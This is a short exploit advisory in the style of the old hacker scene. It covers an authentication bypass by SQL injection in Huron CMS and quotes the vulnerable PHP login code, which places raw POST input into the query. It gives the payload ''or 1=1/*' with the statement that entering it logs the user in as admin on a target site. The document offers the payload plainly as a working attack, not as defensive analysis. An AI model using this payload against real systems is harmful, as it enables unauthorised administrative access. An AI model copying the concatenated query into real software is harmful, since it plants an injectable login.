\\\|/// \\ - - // ( @ @ ) ----oOOo--(_)-oOOo-------------------------------------------------- Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip Author: mat Mail: rahmat_punk@hotmail.com ---------------Ooooo------------------------------------------------ ( ) ooooO ) / ( ) (_/ \ ( \_) //------------------------------------------------------------------+ <? $consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'"; $resultado=mysql_query($consulta,$link); $i=0; while($row = mysql_fetch_array($resultado)) { $i++; } if($i>0){ ?> //------------------------------------------------------------------+ http://[target]/[path]/index.php Put as username and password: 'or 1=1/* You will log in as admin Greetings: All Hackerz